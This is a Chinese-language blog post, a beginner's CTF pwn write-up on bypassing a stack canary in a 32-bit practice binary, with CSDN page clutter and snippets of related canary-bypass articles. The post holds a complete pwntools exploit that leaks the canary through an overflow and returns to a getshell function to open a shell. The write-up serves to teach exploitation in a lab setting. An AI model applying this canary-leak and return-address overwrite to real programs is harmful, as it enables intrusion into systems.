ex2(canary绕过)

最新推荐文章于 2023-01-15 22:40:44 发布
最新推荐文章于 2023-01-15 22:40:44 发布
阅读量489 收藏 2
点赞数 1
分类专栏: ctf pwn 新手
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51687381/article/details/117267075
版权
新手 同时被 3 个专栏收录
23 篇文章 0 订阅
订阅专栏
ctf
15 篇文章 0 订阅
订阅专栏
pwn
11 篇文章 0 订阅
订阅专栏

先上IDA看一波反汇编

简单粗暴,我们步入vuln函数

看到这里其实这个v3是作为vuln函数的canary。这里看还不太明显,我们看汇编

在最后,我们将ebp+var_c的值赋给eax。

然后进行和内存中large gs:14h异或操作,然后进行jz判断。  (其实这里详细的我还不太明白,但是可以看出来是一个函数调用最后的检验作用)

然后我们需要知道:

    在32位函数中函数的调用传参是用 栈来传的。也就是说我们在进行调用的时候,要先压入调用参数,然后是函数的返回地址,然后程序的ebp和esp进行移动(准确的说是加减),创建了该函数的栈帧。

并且关于 canary:

 canary在栈中以\x00结尾,本意是用来截断字符串。我们恰好可以利用这一点。我们覆盖低字节的\x00就可以在后面的read函数中将canary输出出来。

所以我们构造payload

payload = "A"*offset
io.sendline(payload)

io.recvuntil("A"*offset)
Canary = u32(io.recv(4))-0xa  #因为sendline会多输入一个\n  所以我们要减去0xa(换行符)
log.info("Canary:"+hex(Canary))

然后我们根据函数,我们还会进行一次的输入输出。

所以我们再次构造一次payload进行真正的ROP


from pwn import *

context.binary = 'ex2'
#context.log_level = 'debug'
io = process('./ex2')

get_shell = ELF("./ex2").sym["getshell"]

io.recvuntil("Hello Hacker!\n")

# leak Canary
payload = "A"*100
io.sendline(payload)

io.recvuntil("A"*100)
Canary = u32(io.recv(4))-0xa
log.info("Canary:"+hex(Canary))

# Bypass Canary
payload = "\x90"*100+p32(Canary)+"\x90"*12+p32(get_shell)
io.send(payload)

io.recv()

io.interactive()

(exp借鉴他人)

Hush^
关注
专栏目录
【八芒星计划】绕过canary
carol2358的博客
09-02 675
文章目录wdb2018_guess wdb2018_guess 有趣的题目,本题fork了三次,那么就会gets三次 利用三次gets和canary,我们可利用stack smash来获得三次信息 第一次获得libc,第二次获得栈地址,第三次获得flag 覆盖argv[0],也就是程序名所在的位置 先用puts的got来获得libcbase,用libcbase获得environ的地址,也就是stack_end,位置是utf8的位置 然后第二次输入通过environ来获得stack的地址 第三次就可以
Canary绕过方法
最新发布
zhuo1358的博客
03-31 1544
Canary设计其低字节为\x00,本意是阻止被read、write等函数直接将Canary读出来。\x00二话不说,上题基础检查发现canary丢入ida中发现在循环printf,并且存在字符串漏洞(这个稍后再谈)同时有getshell函数可以直接拿shell接下来就是找canary到栈顶的偏移有两种方法,这里先介绍第一种看汇编语言跟进这段函数的汇编发现 多了一段异或比较可以判断canary在var_c里,所以buf 到canary的偏移为0x70-0xc。
绕过canary原理及其利用方式
glhdbk的博客
09-07 4287
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
Canary机制及绕过策略
helloworlddm的博客
06-14 3327
Canary机制 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段(只是缓解机制,不能彻底的阻止),当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让 shellcode
【pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 6064
Canary各种绕过姿势
Canary bypass
空舟的博客
05-04 412
Canary bypass 格式化字符串绕过canary 格式化字符串读取canary的值 //字符串泄露canary,最简单常用 Canary爆破(针对有fork函数的程序) fork作用相当于复制出一个相同的程序,逐位爆破canary的值,如果程序崩溃,则不是canary,反之为canary //局限性比较大,必须有fork函数 Stack smashing(故意触发canary_ssp leak) 劫持_stack_chk_fail 修改got表中_stack_chk_fail函数的地址,在
Ex2
03-13
在这个"Ex2"压缩包中,我们很可能是看到一个关于HTML学习或项目的相关资源,名为"Ex2-main"。 HTML由一系列元素组成,这些元素通过标签来定义。例如,`<html>`标签是文档的根元素,`<head>`包含了文档的元信息,如...
ex2_C++_
10-02
【标题】"ex2_C++_" 是一个C++课程实验的第二部分,主要涉及C++编程语言的基础知识和进阶概念。在这个实验中,学生可能会接触到C++的关键特性,包括但不限于变量、数据类型、控制流结构(如if语句、for循环、while...
DVP-ES2/EX2系列台达PLC部件库
11-05
这对于没有接触过实物的用户来说非常有用,可以帮助他们更好地理解和操作这些设备。 综上所述,DVP-ES2/EX2系列台达PLC部件库是一个非常宝贵的资源,它不仅包含了丰富的部件信息,还提供了详细的技术文档和支持材料...
吴恩达机器学习作业ex2
06-04
https://blog.csdn.net/meijie2018_1/article/details/89737570 https://blog.csdn.net/meijie2018_1/article/details/89839067
ex2data1.zip
09-08
标题 "ex2data1.zip" 暗示我们即将探讨的是一个与机器学习相关的数据集,特别是逻辑回归的实例。这个压缩包中的数据文件 "ex2data1.txt" 很可能包含了用于训练或测试逻辑回归模型的数据。逻辑回归是一种广泛应用的...
使用格式化字符串漏洞绕过Canary保护(32位ELF)萌新篇
weixin_73481933的博客
01-15 496
当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。原理是在一个函数的入口,先从fs/gs寄存器中取出一个四字节(eax)或者八字节的rax的值存在栈上(最低位都是\x00),当函数结束是会检查这个栈上的值是否和存在去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序就会执行___stack_chk_fali函数,继而保护程序。32位文件,开启了NX和Canary保护。
PWN-canary学习
苗_的博客
02-10 1543
先简单介绍一下canary: Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8...
Canary学习(泄露Canary
至臻求学,胸怀云月
01-30 5020
canary 原理 通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp,eip等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址让shellcode执行。 当启用栈保护时,函数开始执行的时候会先往栈底插入cookie信息,如果不合法就停止程序运行(栈溢出发生)。攻击者在覆盖返回地址的时候...
pwn学习-canary
WocW的博客
02-26 2321
CTF-WIKI-pwn-cannary 漏洞复现   Canary 实现原理  开启 Canary 保护的 stack 结构大概如下 // ex2.c #include &lt;stdio.h&gt; #include &lt;unistd.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; void getshell...
【pwn】gwctf_2019_easy_pwn
Nothing
12-09 944
例行检查 分析程序,这个程序是c++写的。在往s中read的时候大小没有问题,但是程序在下面将字符"I"替换成了"pretty",最后在strcpy的时候发生了溢出,没有PIE和canary直接利用即可。 from pwn import * io=remote('node3.buuoj.cn','27671') puts_plt=0x8048DC0 puts_got=0x804C068 main...
格式化字符串绕过canary入门
蚁景网安学院
11-26 430
知识格式化字符串漏洞是因为c语言中printf的参数个数不是确定的,参数的长度也不是确定的,当printf把我们的输入当作第一个参数直接输出的时候,我们输入若干格式化字符串,会增加与格式...
Linux下pwn从入门到放弃
热门推荐
一个码农的笔记
12-15 1万+
0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: (1)gdb:Linux调试中必要用到的 (2)gdb-peda:gdb方便调试的工具,类似的工具有gef,gd
泄露canary
九层台
07-17 1678
题目链接https://pan.baidu.com/s/1CRhWOys3tbRr_uBqRhewsQ 有NX和canary保护。 char v21[257]; // [esp+2Bh] [ebp-10Dh] v21设置了257个字节的空间。 sub_80486FD(dest, 0x200u); v12 = 0; v13 = 0; while ( dest[v12] ...
台达PLC编程指南:DVP-ES2/EX2系列
"台达PLC编程文档,涵盖了台达PLC EX2/ES2系列的编程基础知识、程序概念、指令集以及通讯方面的内容,旨在帮助用户进行编程查询和学习。" 在台达PLC编程中,了解梯形图的基本原理至关重要。PLC扫描方法是指PLC如何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值